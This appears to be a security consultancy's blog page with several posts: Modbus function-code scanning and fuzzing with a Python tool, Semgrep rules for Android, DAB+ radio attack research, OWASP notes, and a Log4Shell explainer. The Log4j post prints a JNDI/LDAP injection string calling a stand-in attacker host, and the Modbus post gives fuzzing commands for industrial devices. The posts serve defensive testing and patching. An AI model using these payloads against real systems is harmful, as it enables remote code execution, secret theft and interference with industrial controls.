Wednesday, March 6, 2024

Testing the Security of Modbus Services


ICS and Building Management Systems (BMS) support several protocols such as Modbus, Bacnet, Fieldbus and so on. Those protocols were designed to provide read/write control over sensors and actuators from a central point. 

Driven by our past experience with BMS, we decided to release our own methodology and internal tool used for proactive attack surface analysis within systems supporting the Modbus protocol.

The Modbus Protocol

Modbus is a well defined protocol described on modbus.org. It was created in 1979 and has become one of the most used standards for communication between industrial electronic devices in a wide range of buses and network.

It can be used over a variety of communication media, including serial, TCP, UDP, etc..

The application part of the protocol is quite simple. In particular, the part we are interested into is its Protocol Data Unit, which is independent from the lower layer protocols, is defined as follows:

| FUNCTION CODE | DATA |

Where FUNCTION CODE is a 1 Byte size 0-127 (0x00-0x7F) value, and DATA is a sequence of bytes that changes according to the function code.

Here is a set of function codes already defined by the protocol specification:


By setting a specific function code together with its expected set of data field values, it will be possibile to read/write the status of coils, inputs and registers, or access information about other interesting aspects such as diagnostic data.

For example the following request, queries about the status of 2 coils starting from address 0x0033 in a remote device:

 \x01\x01\x00\x33\x00\x02  

Where:

| \x01 [SlaveId] | \x01 [Function Code] | \x00\x33 [Address] | \x00\x02 [Quantity] |


As it can be noticed, that is quite similar to an API based modern application, the name of the function and its arguments:

Protocol://URL/EndPoint?Parameters=Values..

Apart from the public function codes, several codes are left as custom implementation and are reserved but not defined in the standard.



In particular 65-72 (0x41-0x48), and 100-110 (0x64-0x6e), for a total of 19 function codes, are left to the vendor/manufacturer for custom implementations.

While some of the vendors make the specification of custom functions, publicly available, with all the expected arguments and formats, in their manuals, others do not release any information.
From a security tester point of view, first questions are:

  • How can we identify if a custom Function Code is implemented but no details are available?
  • How can we find the correct set of expected arguments?
  • How can we fuzz the arguments to find security issues?

Modbus Attack Surface

As defined by the standard, if the client request presents some error the slave response will trigger specific exception codes:

| 0x80 + [Request Function Code] | 0xHH [Exception Code] | ... |

Where exceptions code are the following:



This behavior can help when testing and identifying the exposed services.

In particular, the first three exceptions will help identifying the presence of a custom function code.

  • 0x01 Unimplemented Function: Function does not exist in the present status.
  • 0x02 Function Implemented but address is not correct: Function exists but address is wrong.
  • 0x03 Function Implemented but the arguments are not correct: Function exists but provided arguments are wrong.

As you may already guessed 0x02 and 0x03 responses do actually reveal the presence of a custom function!
On the other hand 0x01 does not mean that there's no custom implementation for that requested function but just that it's not available for the status of the device and it will require some more analysis effort.

The Methodology

Apart from public function codes, where it would be quite easy to check for read/write access to data, we want to identify if there's a set of implemented custom function codes on a black box system.

According to the response, we'll identify if a function code is implemented by analyzing the response for each required function code:

for code in function_codes:


resp = send(code)

if has_exception(resp):

  switch(exception(resp)):

      case 0x01: # UNIMPLEMENTED Function Error

                    #Function does not Exist (maybe)!  

          break;

      case 0x02: # Invalid Address Error

                    #Function Exists ! 

         break;

      case 0x03: # Invalid Data Error

                    #Function Exists ! 

         break;

      default: # other codes..

         break;


the previous pseudo code shows the approach we use to identify if a custom function is implemented and where we should fuzz.

The Tool

Here comes M-SAK (the Modbus Swiss Army Knife), a pretty useful command line and library which can help for scanning and identifying custom functions on a Modbus device.
MSAK is a tool written in Python to help discovering and testing exposed standard and custom services of Modbus Servers/Slaves over Serial or TCP/IP connections. 

It also offers a highly customizable payload generator that will help the tester to perform complex scans using a simple but powerful templating format.

MSAK can help in:
- finding undocumented functions 
- fuzzing the arguments in order to find security issues or weird behavior.

For example if we want to scan all function we can just use the Service Scan option, which will scan all functions codes [1-127] using the given payload and then will print a summary grouped by response:

 $ python3 msak.py -S -d '0001'
Requested Data \x01\x01\x00\x01\x91\xD8
..
Requested Data \x01\x02\x00\x01\x91\xD8
..
Requested Data \x01\x03\x00\x01\x91\xD8
...
Requested Data \x01\x64\x00\x01\x91\xD8
...
ILLEGAL DATA VALUE
1 (0x01) Read Coils [FUN_ID|ADDRESS|TOTAL NUMBER| >BHH]
2 (0x02) Read Discrete Inputs [FUN_ID|ADDRESS|TOTAL NUMBER| >BHH]
3 (0x03) Read Holding Registers [FUN_ID|ADDRESS|TOTAL NUMBER| >BHH]
4 (0x04) Read Input Registers [FUN_ID|ADDRESS|TOTAL NUMBER| >BHH]
15 (0x0F) Write Multiple Coils [FUN_ID|ADDRESS|TOTAL NUM|BYTE COUNT|BYTE VALS >BHHBN*B]
16 (0x10) Write Multiple registers [FUN_ID|ADDRESS|TOTAL NUM|BYTE COUNT|VALS >BHHBN*H]
20 (0x14) Read File Record
ACCEPTED_WITH_RESPONSE
5 (0x05) Write Single Coil [FUN_ID|ADDRESS|COIL VALUE| >BHH]
6 (0x06) Write Single Register [FUN_ID|ADDRESS|REG VALUE| >BHH]
17 (0x11) Report Server ID (Serial Line only)  [FUN_ID >B]
105 CUSTOM
ILLEGAL FUNCTION
7 (0x07) Read Exception Status (Serial Line only) [FUN_ID >B]
8 (0x08) Diagnostics (Serial Line only) [|FUN_ID|SUB_FUN|VALUES| >BHN*H]
9 CUSTOM
10 CUSTOM
11 (0x0B) Get Comm Event Counter (Serial Line only) [FUN_ID >B]
12 (0x0C) Get Comm Event Log (Serial Line only)[FUN_ID >B]
13 CUSTOM
....
ILLEGAL DATA ADDRESS
21 (0x15) Write File Record

The result shows that a custom function 0x69 (105) was found as the device responded with a 0x03 exception (Illegal data value). We can now try to find the correct set of arguments through fuzzing using the following command: 


$ python3 msak.py -C -d '0169{R[0,0xFF,">H"]}'

Which will send 0 to 65535 requests and collect the responses.
In fact:
- 0x01 is the slave ID
- 0x69 is the service function
- R[0,0xFF,">H"] asks to generate 0-65535 sequence of payloads in for a 2 Bytes, little endian format.
- the request will be via serial port and the CRC are automatically computed.

After the whole scan, MSAK will return an output similar to the following:

{
'NO_RESPONSE':
  [ ... 
   b'\x01\x69\x36\xfe',
  ...
  ], 
'ACCEPTED_WITH_RESPONSE': 
  [ b'\x01\x69\x36\xff', 
    b'\x01\x69\x37\x00',
...
  ]
}


We have found that the undocumented function responds to arguments values of \x36\xff and \x37\x00! 
Next step is to play with this new function and see if there's some way to abuse it...
What could go wrong if an undocumented function for firmware update is found, right?! :P 

For more information, the fuzzing engine support several template patterns documented on MSAK README file.

N.B.: The fuzzing template engine is available also as a separate python library called Simple Payload Generator.

Conclusions

Although Modbus is a quite old protocol, it's still used on Build Management Systems, Industrial Control Systems and SCADA Systems. 
Apart from dealing using well defined functionalities, to  read/write sensors and controls, which could lead to very interesting security issues, the standard leaves pretty much space to vendors for implementing their own services and that might be even more interesting from a security point of view!
That's where MSAK can give its best by automating the boring part and leave all the fun to the tester!

Feel free to send us your feedback and happy hacking!

Author: Stefano Di Paola 
Twitter: @WisecWisec 

Monday, October 23, 2023

Semgrep Rules for Android Application Security

Introduction

The number of Android applications has been growing rapidly in recent years. In 2022, there were over 3.55 million Android apps available in the Google Play Store, and this number is expected to continue to grow in the years to come. The expansion of the Android app market is being driven by a number of factors, including the increasing popularity of smartphones, the growing demand for mobile apps, and the ease of developing and publishing Android apps. At the same time, the number of Android app
downloads is also growing rapidly. In 2022, there were over 255 billion Android app downloads worldwide.

For this reason, introducing automatic security controls during Mobile Application Penetration Testing (MAPT) activity and the CI phase is necessary to ensure the security of Android apps by scanning for vulnerabilities before merging into the main repository.


Decompiling Android Packages

The compilation of Android applications is a multi-step process that involves different bytecodes, compilers, and execution engines. Generally speaking, a common compilation flow is divided into three phases:

  1. Precompilation: The Java source code(".java") is converted into Java bytecode(".class").
  2. Postcompilation: The Java bytecode is converted into Dalvik bytecode(".dex").
  3. Release: The ".dex" and resource files are packed, signed and compressed into the Android App Package (APK)

Finally, the Dalvik bytecode is executed by the Android runtime (ART) environment.

Generally, the target of a Mobile Application Penetration Testing (MAPT) activity is in the form of an APK file. The decompilation of the both aforementioned bytecodes is possible and can be performed through the use of tools such as Jadx.

jadx -d ./out-dir target.apk


OWASP MAS

The OWASP MAS project is a valuable resource for mobile security professionals, providing a comprehensive set of resources to enhance the security of mobile apps. The project includes several key components:
  • OWASP MASVS: This resource outlines requirements for software architects and developers who aim to create secure mobile applications. It establishes an industry standard that can be used as a benchmark in mobile app security assessments. Additionally, it clarifies the role of software protection mechanisms in mobile security and offers requirements to verify their effectiveness.
  • OWASP MASTG: This comprehensive manual covers the processes, techniques, and tools used during mobile application security analysis. It also includes an exhaustive set of test cases for verifying the requirements outlined in the OWASP Mobile Application Security Verification Standard (MASVS). This serves as a foundational basis for conducting thorough and consistent security tests.
  • OWASP MAS Checklist: This checklist aligns with the tests described in the MASTG and provides an output template for mobile security testing.
OWASP MAS
https://mas.owasp.org/


Semgrep

Semgrep is a Static Application Security Testing (SAST) tool that performs intra-file analysis, allowing you to define code patterns for detecting misconfigurations or security issues by analyzing one file at a time in isolation. Some advantages of using Semgrep include:

  • It does not require that the source code is uploaded to an external cloud.
  • It does not require that the target source code is buildable and have all dependencies. It can work only with a single source file.
  • It is exceptionally fast.
  • It allows you to write your custom patterns very easily.
Once Semgrep is integrated into your CI pipeline, it automatically scans your code for potential vulnerabilities every time you commit changes. This helps identify and address vulnerabilities early in the development process, improving your software's security.

Key Insights on Semgrep

First of all, install Semgrep with the following command:
python3 -m pip install semgrep
Semgrep accepts two fundamental input:
  • Rules collection: A collection is composed by ".yaml" files, alternatively referred to as "rules". A rule includes a series of patterns designed to identify or exclude specific elements within the target source code.
  • Target source code: This denotes the source code subject to analysis. It may also encompass partial code or code with certain dependencies omitted.
The four main elements you can find inside a Semgrep rule yaml file are:
...Match a sequence of zero or more items such as arguments, statements, parameters, fields, characters.
"..."Match any single hardcoded string.
$AMatch variables, functions, arguments, classes, object methods, imports, exceptions, and more.
<... e ...>Match an expression ("e") that could be deeply nested within another expression.

Moreover, Semgrep provides several experimental modes that could be really useful in more difficult situations:
  • taint: It enables the data-flow analysis feature allowing to specify sources and sinks.
  • join: It allows to use multiple rules on more than one file and to join the results.
  • extract: It allows work with source file that contains different programming languages.
Suppose to have a rules collection in the directory "myrules/" and a target source code "mytarget/". To launch a Semgrep scan is very simple:
semgrep -c ./myrules ./mytarget

Wednesday, June 21, 2023

A Cool New Project: Semgrep Rules for Android Apps Security

Android Logo with a key like shape to introduce security.

In today's digital landscape, mobile application security has become an paramount concern

With the increasing number of threats targeting Android applications and the stored personal data, developers and security professionals alike are seeking robust solutions to fortify their code against potential vulnerabilities. 

That's why speeding up the time and minimizing the effort in the identification of mobile security issues has become definitely important.

We are excited to introduce our new project, focused on creating Semgrep rules specifically designed to enhance the security of Android apps.

Semgrep Rules for Android Application Security

The project provides a new set of specific rules for OWASP Mobile Security Testing Guide (MSTG), that will help to find security issues using static code analysis (SAST).

The Project

The OWASP Mobile Security Testing Guide (MSTG) is an invaluable resource for assessing the security posture of mobile applications. It provides comprehensive guidelines and best practices to identify and address potential security weaknesses. However, manually conducting these tests can be time-consuming and prone to human error. 

This is where this project come into play. 

By creating a set of Semgrep rules based on the OWASP Mobile Security Testing Guide, we aim to automate and streamline the security testing process for Android applications. 

These rules act as a way to shift left in the SDLC of Mobile apps, enabling developers and security practitioners to efficiently identify and mitigate vulnerabilities in their code. 

With Semgrep's static analysis capabilities and the knowledge base of the MSTG, we can significantly enhance the effectiveness and efficiency of mobile apps security assessments. 

Our project bridges the gap between theory and practice, empowering developers to build robust and resilient Android applications while ensuring that security remains a top priority.

Status

Since the beginning of the project to the present stage, we have continuously strived to deliver a solution to empower developers and security practitioners and defend against evolving threats and safeguard user data. 

The actual status of our project shows where it's going to be improved and where the semgrep version limitation is a blocker to create a useful rule is shown here, and every improvement will be updated as soon as it will be implemented.




Check it out now!

How to contribute:

In future posts we'll give some insight and explain how everyone can contribute to the project, in the meantime, your feedback is absolutely welcome! 

We strongly believe in the power of collaboration and community involvement, hence we invite developers, security enthusiasts, and Android app experts to actively contribute to our project through our GitHub repository. 

By participating in the project, you can contribute new Semgrep rules, suggest improvements to existing rules, report bugs, or even share insights and ideas to enhance the overall effectiveness of our Android app security framework. 

Visit our GitHub repository to explore the project, engage with fellow contributors, and make a meaningful impact in the field of mobile app security. 

Credits





Monday, March 27, 2023

20 years of Software Security: threats and defense strategies evolution

 Software security has come a long way in the past two decades. With the advent of new technologies and a rapidly evolving threat landscape, defending against cyber attacks has become more challenging than ever before. We recently presented on the evolution of software security threats and defense strategies at the Security Summit in Milan on 15th March 2023. In this blog post, we'll explore some of the key takeaways from the presentation.

In the early 1990s, the Internet was still in its infancy, and most people accessed it through their workstations or personal computers. Security threats were relatively simple, and malware and viruses were typically spread through floppy disks or infected email attachments. As the Internet became more ubiquitous, so did the security threats. In the early 2000s, browser-based attacks became more common, and operating systems became a prime target for cyber criminals.

With the rise of mobile devices in the 2010s, new security challenges emerged. Smartphones and tablets became a popular target for attackers, and the proliferation of internet-connected devices made it easier than ever for hackers to find vulnerabilities. The number of devices and users increased rapidly, creating a larger attack surface for hackers to exploit.

Fast forward to 2020, and the Internet of things (IoT) and automotive industries are the new frontiers of software security. IoT devices such as home assistants, smart thermostats, and security cameras are often poorly secured and easily hacked. Automotive software is becoming increasingly complex, with trillions of lines of code running on modern cars. The increasing use of artificial intelligence (AI) and machine learning (ML) in software also presents new security risks.

The timing for a successful attack has also changed dramatically over the years. In the past, attackers had to rely on users to download and execute malicious software. Today, many attacks are automated and can happen in real-time, targeting vulnerable devices as soon as they connect to the Internet.

As software becomes more integrated into our lives, the security risks also increase. In the past, a security breach might have resulted in the loss of some data or a temporary disruption in service. Today, a security breach could have much more serious consequences, including the loss of life in the case of critical infrastructure or autonomous vehicles.

The evolution of software security approach is as important as the evolution of the software security scenario itself. In the early days of software development, security was not given much importance. But as the importance of technology grew, the security risks also grew, which led to the evolution of the software security approach.




Let's take a look at the three stages of software security approach evolution:

See the report as a punishment:
In the early days of software development, software security was not considered a priority. Most developers focused on creating functional and feature-rich applications without thinking about the security aspects. Security audits were conducted only after the software was developed and ready for deployment. These audits were seen as a punishment, rather than a proactive measure to ensure security. This approach was ineffective and led to many security breaches.

Testing solves everything:
The second stage of software security approach evolution was the belief that testing could solve all security issues. Developers started to incorporate testing tools into the software development process to detect vulnerabilities early on. The testing tools were seen as a panacea for all security issues. While testing tools are useful in identifying vulnerabilities, they are not foolproof. 


Fixing! What is fixing? Testing is not enough?
The third and current stage of software security approach evolution is the belief that fixing vulnerabilities is crucial to ensuring software security. Developers now understand that fixing vulnerabilities is a continuous process that must be carried out throughout the software development lifecycle. Developers have now started to incorporate security measures into the design and development of software to prevent vulnerabilities from being introduced in the first place.

Moreover, developers are now also adopting a "shift left" approach to software security, where security is integrated into the software development process from the very beginning. Developers are also relying on security tools and techniques such as threat modeling, code reviews, and penetration testing to detect and fix vulnerabilities.


Common mistakes over the last 20 years from our experience.

One of the biggest mistakes made in the last 20 years is the fault placed solely on developers for security issues. This approach is ineffective and ugly. Developers cannot be solely responsible for security issues as it requires a multi-faceted approach.

Another common mistake is the testing methodology. Testing should be integrated into the development process, and not performed separately. If testing is conducted separately, there is a high risk of delivering software that has not been tested adequately.

Fixing: what is fixing? Fixing is a crucial aspect of software security. The time taken to remediate security vulnerabilities is often too long. Instant security feedback is necessary in modern software projects. Security must be shared, and data about threats, defenses, vulnerabilities, and attacks must be made public to be effective.

Software security is not just one person's responsibility, but everyone's. Security champions are essential in supporting developers and others. They can help to make decisions about when to engage the security team, triage security bugs, and act as the voice of security for a given product or team.


To help organizations address these challenges, the Open Worldwide Application Security Project (OWASP) has developed several frameworks, including OWASP Open SAMM and the recently launched OWASP Software Security 5D Framework.

Traditionally, secure software development lifecycle (SDLC) frameworks like Microsoft SDL, BSIMM touchpoint, and OWASP SAMM have been used to assess software security. However, these frameworks lack the level of awareness, security team, security standards, and security testing tools needed to address today's challenges. 

The OWASP Software Security 5D Framework is designed to help companies understand the need to grow in all five dimensions simultaneously: TEAM, AWARENESS, STANDARDS, PROCESSES, and TESTING.

 



The OWASP 5D framework is more practical and focuses on evaluating the maturity of a software security framework in all five dimensions simultaneously, rather than just one or two. The framework helps organizations measure their company culture on software security, enforce trust relationships between their company and clients, demonstrate improvements, and have a vision of how to manage their software security roadmap.


One of the key benefits of the OWASP 5D framework is that it enables organizations to create a software security strategy that takes into account the maturity level of their outsourcers. By doing so, they can ensure that the outsourcer is implementing HTTPS, using OWASP guidelines, and conducting penetration testing as part of the software development lifecycle. Additionally, OWASP SAMM assessment and 5D framework are standards that allow organizations to assess their software security maturity level and communicate it to clients and stakeholders effectively.

In conclusion, The OWASP Software Security 5D Framework helps you to:

  • Measure your company culture on SwSec (not your number of vulnerabilities!)
  • Enforce the trust relationships between your company and your clients
  • Demonstrate your improvements
  • Have a vision of how to manage your Software Security roadmap

Everyone in the organization is responsible for software security, and OWASP frameworks like the Software Security 5D Framework and OWASP SAMM Assessment can help organizations create a software security strategy that addresses the challenges associated with software security today.

Please send an email to: SwSec5D@mindedsecurity.com to request your copy of the presentation.

 

 

Friday, February 24, 2023

OWASP Global AppSec Dublin 2023: WorldWide and Threat Modeling


The OWASP Global AppSec Dublin 2023 conference was a truly inspiring event for anyone involved in application security. As an attendee, I was able to catch up with OWASP colleagues and hear from experts on a range of topics. 
In particular, there were two themes that really stood out to me: worldwide and threat modeling.

OWASP: The Open Worldwide Application Security Project

During the conference, the OWASP Board made an exciting announcement regarding the meaning of the letter "W" in OWASP. Traditionally, the "W" in OWASP has stood for "Web," reflecting the organization's initial focus on web application security. The Board announced they are changing the meaning of the "W" to "Worldwide," reflecting the global nature of the OWASP project and its mission.

This change is significant because it recognizes that application security is no longer limited to just web applications. With the proliferation of mobile and IoT devices, cloud computing, and other emerging technologies, application security has become a much broader concern. By changing the meaning of the "W" to "Worldwide," OWASP is acknowledging this reality and expanding its focus to include all types of applications. 
 
The change in the meaning of the "W" in OWASP from "Web" to "Worldwide" is a significant development for the organization and the application security community as a whole. It reflects the evolving nature of application security and the importance of the global community in addressing these challenges. I am excited to see how this change will shape the future of OWASP and its mission to make software security visible worldwide.

Threat Modeling

Threat modeling is a structured approach for identifying, quantifying, and addressing the security risks associated with an application. In recent years, there has been a growing interest in this area, and the conference featured a keynote and two talks on the subject.

The conference had a keynote, a training session and 2 talks regarding threat modeling. The keynote, “A Taste of Privacy Threat Modeling” by Kim Wuyts, focused on threat modeling privacy. Ms. Wuyts spoke about how to identify potential privacy threats and how to mitigate those risks. She also provided insights into best practices for threat modeling in a privacy context. 
 
Other talks at the event emphasized practical approaches on Threat Modeling that are essential for companies to adopt in order to develop more secure products and services. These presentations provided valuable insights and actionable recommendations that can help organizations improving their security posture and better protect their customers' data and privacy.

Threat modeling is not a new concept. In fact, it has been around for quite some time. However, it has only recently gained traction within the application security community. This is likely due to the increasing number of data breaches and cyber attacks that have occurred in recent years. Organizations are now more aware than ever of the need to secure their applications against potential threats.
 
Since the inception of our company in 2007, we have been advocating for the promotion of Threat Modeling activities. However, it was only in recent years that we have observed a significant increase in interest in this area. The growing discourse around Threat Modeling indicates a broader recognition of its importance in ensuring the security of software and systems.

More information about threat modeling:
 
 

Testability patterns for web applications, a new OWASP Project

TESTABLE is an EU-funded project under the Horizon 2020 Research and Innovation Actions program, designed to address the significant challenge of building and maintaining secure and privacy-
friendly modern web-based and AI-powered application software systems.

IMQ Minded Security is part of the TESTABLE consortium together with CISPA, Eurecom, TUBS, UC3M, SAP SE, ShiftLeft GmbH,  NortonLifeLock and Pluribus One.

We would like to express our appreciation to Luca Compagna, Senior Scientist and Research Architect at SAP Security Research, for his insightful presentation on a new OWASP project aimed at making our Testability Patterns for Web Applications accessible and improvable by the wider community.

During the presentation, Luca emphasized the critical role of testability in ensuring the security and privacy of Web Applications, and demonstrated our approach in the context of Static Application Security Testing (SAST). Specifically, we provided concrete examples of SAST testability patterns and how they can hinder the analysis of web application code by state-of-the-art SAST tools.

He also showcased our open source framework for implementing these patterns, which enables the evaluation of SAST tools against the testability patterns, highlighting which patterns pose problems for specific tools. Additionally, the framework enables the identification of testability patterns within the source code of web applications, informing developers of areas that may prove challenging for SAST.

Towards the end of the presentation, he introduced the three main target audience groups: web developers, SAST tool developers, and security central teams. For each group, we highlighted the value-added by these SAST patterns and provided guidance on how they can participate in our project community and contribute to the creation and maturation of testability patterns. Finally, we presented our plan for the OWASP project.

More information regarding testable:
 
 
You can see all the Conference's video here.


Thursday, July 28, 2022

UN ECE 155 Threats in the real world: Wireless Networking Attacks and Mitigations. A case study


On March the 31st, I gave a quick talk on automotive security at VTM titled "UN ECE 155 Threats in the real world: Wireless Networking Attacks and Mitigations. A case study" (slides here).

The idea was to create some content about one of the most hyped topics in the automotive cyber security world over the last year, without keeping it just theoretical;

UN/ECE 155 and ISO/SAE 21434 whose concerns are about the implementation of a CSMS (Cyber Security Management System) which consists in performing, for each vehicle, several high level security tasks, such as Threat Analysis and Risk Assessment (TARA), supply chain security issues tracking, implementation of the mitigations, update management and so on.

The following schema shows the product development lifecycle model, called V-Model, used in the automotive industry and the cybersecurity processes in each phase of the V-Model.

 

The most interesting point that can help mitigating the risks and performing attack surface analysis is the TARA which can really help to minimize the risk in the earliest stage. In particular it will give its best, well when the technologies that are going to be implemented, are well known from a security perspective

The following figure describes the steps that must be covered to perform a TARA by the ISO 21434:


Since the audience was expected to be mixed technical/non technical I decided to keep it in the middle as well, which, alas, sometimes means the hard way.

Also, how to go practical without going vehicle specific? mmm, take something that is already on every vehicle and talk about attacks, risks and remediations in the context of UNECE R155 and ISO 21434 requirements.

Digital Radio Broadcasting! 

Now, the problem is to research on those topics without being too obvious and condense all in a limited span of 30 minutes which is quite challenging.

With the goal of identifying some unexplored attack surface, I took a couple of weeks to go into RDS and DAB+ specifications and their previous research in the security context. 

As briefly described in the slides in IMQ Minded Security I created a lab testbed with:

  • A RDS transmitter using Raspberry PI and this wonderful piece of software
  • Several non automotive RDS receivers and their software and a Renault Scenic 2015 Head Unit with RDS support.
  • A DAB+ transmitter using HackRF One, and this essential set of software together with this very useful tutorial
  • A RTL-SDR for local tests and a DAB+ USB Dongle receiver that is also used in the automotive world with the most used Android Automotive OS  software DAB-Z and several other applications that are mostly used in desktop environments. Alas, apart from DAB-Z we had no immediately available automotive head units supporting DAB+ :/.
The threats were identified after reading the whole RDS and DAB+ documentation and condensed for the talk.

The most interesting turned out to be DAB+ which has much more perimeter.

and has already at least one known real world issue



Next step was to identify a number of possible threats and attacks by studying the DAB+ specifications, a subset of tests was shown during the talk:


Apart from creating filenames with no extension, we identified several more possible attacks on parsers such as creating malformed unicode filenames, EPG, Journaline and other DAB+ defined formats.
The stumbling blocks when going practical was that some of those formats were not implemented by the receivers we tested, so we decided to keep the tests for future activities.

Results

The most interesting issues were found on DAB+ desktop software, resulting in path traversal and HTML injection.




Unfortunately, the lack of head units or vehicles prevented us to perform more thorough tests to get some more juicy stuff..
Let's see what the next weeks will give back, since we are expecting new hardware to perform more tests!

PS. We were expecting to have a video of the talk to publish, but it's not clear when and if.. so here are the slides of the talk:

Feel free to comment or contact us for any question!

Tuesday, December 14, 2021

The Worst Log Injection. Ever. (Log4j [2.0.0-alpha,2.14.1] )

There has been such a hype about the Log4j issue and since IMQ Minded Security mission has always been about fixing, this informal post is about what's going on, how to check if someone's system is likely affected and how to fix the issue.

UPDATE 12-17-2021: Since several bypasses to the mitigations implemented on version 2.15/16 were found, be sure to update to  Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later) as described here and here ASAP!

What's the Buzz? (The Problem)

On Thursday 12/09/2021 a vulnerability affecting a very popular logging Java library was published on Github. A few hours later the infosec community was on fire.

The issue falls in the category of Template Language Injection, which involves a parser that is triggered to perform certain actions when particular sequences are found in the parsed string.

The library is Log4j and the vulnerable methods (sinks) are the ones that are usually called to actually log messages in files to keep track of events happening during the execution of an application:
  • log
  • fatal
  • error
  • warn
  • trace
  • ..


It means that, if the application wants to log some dynamic content coming from an external source, such as, a message about an error login from a non existing username, it might call something like:

logger.warn(username + " not found!");

If the username value is controlled by a malicious user it will be possible to exploit the vulnerability and even execute arbitrary code on the affected platform.

In particular, if an attacker is able to control the log message string, even partially, and he is able to inject the '${' and '}' metacharacters the Log4j Interpolator will parse the content and look for specific patterns.

According to the Interceptor class the following patterns are enabled by default:
  • log4j
  • sys 
  • env
  • main
  • marker
  • java
  • lower
  • upper
  • date
  • ctx
  • jndi (if org.apache.logging.log4j.core.lookup.JndiLookup is present)
  • web (if org.apache.logging.log4j.web.WebLookup is present)
  • docker 
  • spring
  • kubernetes
  •  

    So, the real deal is about an attack that can be performed via JNDI:LDAP keyword (or similar patterns such as RMI, COS etc..). In fact by injecting something like:

    ${jndi:ldap://EVILLDAP:[PORT]/XX}

    as argument in the sink method, Log4j will:

    1. trigger a DNS request to check if the EVILLDAP hostname needs to be resolved
    2. perform an LDAP request to the (attacker controlled) LDAP server hosted on the resolved IP
    3. the attacker controlled LDAP server will then be able to reply with a malicious serialized Java object, which will be executed on the Log4j side.
    4. if the malicious object, by abusing internal features (gadgets), is able to trigger the correct set of instruction, the vulnerability will be successfully exploited.

    As can be noted, this is a two stages attack, in fact, after the vulnerability is triggered, the vulnerable application needs to send a request to the malicious server in order to get the RCE payload.

    What's the Impact and How about the Risk? (The Attack)

    The worst impact is the Remote Code Execution, which requires:

    1. the victim machine must be able to perform outbound requests 
    2. the attacker must be able to use the correct gadget chain to successfully perform the attack.
     Another important impact involves Exfiltration of Confidential Information via other pattern such as:
    • env:KEY
    • sys:KEY
    • ctx:KEY
    • web:KEY
    • ..
    In conjunction with DNS Requests or other layer 7 requests.
    Which requires that:
    1. the victim machine is allowed to perform DNS requests or perform outbound requests 
    In this second attack the attacker will be able to gather information such as internal cryptography keys or similar data from application mapped strings.

    Which Version is Affected?

    All version of Apache Log4j 2 until 2.15 excluded are affected. 

    In particular: 2.0-beta9 <= Apache Log4j <= 2.14.1

    Log4j version 1 might be affected in some specific case if JNDI is enabled, but it is not by default.

    WARNING: there is a bunch of blog posts asserting that some Java version mitigates the attacks, but that is NOT true. The vulnerability is independent on the Java version.

    Am I Vulnerable? (The Check)

    There are several ways to check if some of the deployed application is vulnerable...the correct answer would be implement Supply Chain Management, but this paragraph is for practical, urgent actions.

    If you've already implemented a process which allows to list:

    • *All* your applications and versions
    • *Where* they are deployed
    That list is called SBOM (Software Bill of Materials) which list of all the used software, libraries included and their versions.
    If you have it, there are very good chances that the time spent to find & fix everything will be relatively small.

    But, of course, having it depends on the maturity of the security process implemented in your company (check this out if you're interested in our services).

    Consider an enterprise without a SBOM. They might have hundreds of deployed software from external vendors and internally developed custom software. Meaning it will require a big effort of time and resources to prioritize and patch.

    If no SBOM is in place then, the first thing to do is to roll up your sleeves and for each instance:

    1. Login
    2. Check if there are running processes using java.
    3. Identify the directories and use the open source OWASP Dependency Check (or similar products).

    OWASP Dependency Check is able to recursively check for vulnerable libraries in a EAR/WAR/JAR deployed applications and also other files like POM.xml.

    Finally, have a look at the Indicator Of Compromise list that might help in case there's already been a security incident.

    How can I mitigate the risk? (The Fix)

    The permanent ones:
    • For each affected vendor you should ping them, asking for a patch or minor release. If they tell you that you must update to a major release and your product is not EOL, you should insist for a minor/patch level release which addresses the vulnerability.
    • For each internal application update Log4j library to version 2.16.
      • WARNING: Log4j 2.16 requires Java 8, so if you have Java < 8 there might be some more time consuming effort. In that case see if the following workaround is worth trying.

    The workarounds:
    • if Log4j version >= 2.10, as explained here, you can do the following steps:
      1. export the following ENVIRONMENT VARIABLE to the whole OS as LOG4J_FORMAT_MSG_NO_LOOKUPS=true
      2. relaunch the application.
      3. Check if you're still vulnerable with a POC.
    • For each affected machine:
      • if it's not supposed to generate egress traffic block DNS requests and new outbound traffic.
      • if it's supposed to generate outbound traffic, well...that falls into anomaly detection category, which could help but be sure that it is not a fingerprint based one since there's a lot of ways to bypass blocking rules.
      • last but not least it might be interesting to experiment some kind of RASP, such as this one, which will be able to identify contextual traffic without the risk of bypasses.
    Here's a nice InfoGraphics about the attack flow and the points of mitigation from GovCert.CH:



    Conclusions

    This post was written in order to give some clarification about the CVE-2021-44228 and to give some thoughtful information regarding attacks, checks and fixes. 
    Please comment/email us if you need more clarifications.